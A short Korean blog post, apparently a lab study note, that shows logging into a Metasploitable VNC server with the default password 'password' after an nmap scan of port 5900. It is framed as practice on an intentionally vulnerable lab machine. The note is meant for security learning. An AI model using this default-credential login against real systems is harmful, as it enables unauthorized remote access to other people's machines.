Self-Improvement
VNC Server 'password' Password 취약점 본문
*정의
상대 서버에는 VNC서버가 구동중이며 약한 암호로 설정이 되어있으며 암호는 “password“이다. 이를 통해서 로그인 및 서비스 제어를 할 수 있어 인증되지 않은 공격자에 의해 악용될 수 있습니다.
Attacker : kali
Victim : metasploitable
*실습
(kali)
root@kali:~# nmap -sV -p 5900 192.168.10.134
r oot@kali:~# vncviewer 192.168.10.134
패스워드 : password로 하였더니 성공하였다.
'Kali Linux > Metasploitable' 카테고리의 다른 글
| python으로 app.py 설치시 web모듈 에러 (0) | 2018.10.21 |
|---|---|
| Multiple Vendor DNS Query ID Field Prediction Cache Poisoning 취약점 (0) | 2018.10.21 |
| NFS Exported Share Information Disclosure 취약점 (0) | 2018.10.21 |
| Bind Shell Backdoor Detection 취약점 (0) | 2018.10.21 |
| 세션을 이용한 post/hashdump (패스워드 크랙) 실습 (0) | 2018.10.21 |
'Kali Linux/Metasploitable' Related Articles
more
